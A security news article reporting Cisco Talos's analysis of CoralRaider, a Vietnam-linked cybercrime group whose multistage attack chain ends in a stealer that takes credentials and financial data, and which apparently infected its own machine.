Headline
Vietnamese Cybercrime Group CoralRaider Nets Financial Data
With a complex attack chain and using Telegram for its command and control, CoralRaider targets victims in Asian countries — and appears to have accidentally infected itself as well.
Source: incamerastock via Alamy Stock Photo
A newcomer cybercrime group linked to Vietnam has targeted individuals and organizations in Asia, attempting to steal social media account information and user data.
CoralRaider, which first appeared in late 2023, relies heavily on social engineering and legitimate services for data exfiltration, and it develops custom tools for loading malware onto victim systems. Yet the group has also made some rookie mistakes, such as inadvertently infecting their own systems, which exposed their activities, threat researchers with Cisco’s Talos threat intelligence group stated in a new analysis on CoralRaider.
While Vietnam has become increasingly active in cyber operations, this group does not appear to be working with the government, says Chetan Raghuprasad, security research technical leader for Cisco’s Talos group.
“The main priority is financial gain, and the actor is attempting to hijack the victim’s social media business and advertis[ing] accounts,” he says. “The potential exposure for follow-on attacks, including delivering other malware, is also possible. Our research has not seen any examples of other payloads being delivered.”
Vietnam threat actors frequently focus on social media. The infamous OceanLotus group — also known as APT32 — has attacked other governments, dissidents, and journalists in Southeast Asian countries, including in Vietnam. A military-associated group, Force 47 — linked to the Vietnamese army’s official television station — regularly attempts to influence social media groups.
CoralRaider, however, appears to be connected to profit motives rather than nationalist agendas.
“At this moment, we do not have any evidence or information on signs of CoralRaider working with the Vietnamese government,” Raghuprasad says.
Multistage Infection Chain
A CoralRaider campaign typically starts with a Windows shortcut (.LNK) file, often using a .PDF extension in an attempt to fool the victim into opening the files, according to the Cisco analysis. Following that, the attackers move through a series of stages in their attack:
Windows shortcut downloads and executes an HTML application (HTA) file from an attacker-controlled server
HTA file executes an embedded Visual Basic script
VB script executes a PowerShell script, which then runs three more PowerShell scripts, including a series of anti-analysis checks to detect if the tool is running in a virtual machine, a bypass for the system’s User Access Controls, and code that disables any notifications to the user
Final script runs RotBot, a loader that performs detection evasion, conducts reconnaissance on the system, and downloads a configuration file
RotBot then typically downloads XClient, which collects a variety of user data from the system, including social media account credentials
In addition to credentials, XClient also steals browser data, credit card account information, and other financial data. And lastly, XClient takes a screenshot of the victim’s desktop and uploads it.
Meanwhile, the researchers say there are indications that the attackers had targeted individuals in Vietnam as well.
“The [XClient] stealer function maps the stolen victim’s information to hardcoded Vietnamese words and writes them to a text file on the victim machine’s temporary folder before exfiltration,” the analysis stated. “One example function we observed is used to steal the victim’s Facebook Ads account that has hardcoded with Vietnamese words for Account rights, Threshold, Spent, Time Zone, and Date Created.”
Shooting Themselves in the Foot
The CoralRaider group used an automated bot on the Telegram service as a command-and-control channel and as well as to exfiltrate data from victims’ systems. However, the cybercriminal group appears to have infected one of their own machines, because the Cisco researchers discovered screenshots of the information posted to the channel.
“Analyzing the images of the actor’s Desktop on the Telegram bot, we found a few Telegram groups in Vietnamese named 'Kiém tien tử Facebook, ‘Mua Bán Scan MINI,’ and 'Mua Bán Scan Meta,’” Cisco Talos stated in the analysis. “Monitoring these groups revealed that they were underground markets where, among other activities, victim data was traded.”
CoralRaider’s arrival on the cyber threat scene is not surprising: Vietnam is currently facing an increase in threats from account-stealing malware, says Sakshi Grover, research manager in IDC’s Cybersecurity Services group for the Asia/Pacific region.
“While historically less associated with cybercrime compared to other Asian nations, Vietnam’s rapid adoption of digital technologies has made it more susceptible to cyber threats,” she says. “Advanced persistent threats (APTs) are increasingly targeting government entities, critical infrastructure, and businesses, utilizing sophisticated techniques like custom malware and social engineering to infiltrate systems and steal sensitive data.”
Because economic conditions vary across Vietnam — with some areas experiencing limited job opportunities, resulting in low wages for highly skilled roles — individuals can be incentivized to engage in cybercrime to make money, Grover says.
About the Author(s)
Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT’s Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline Journalism (Online) in 2003 for coverage of the Blaster worm. Crunches numbers on various trends using Python and R. Recent reports include analyses of the shortage in cybersecurity workers and annual vulnerability trends.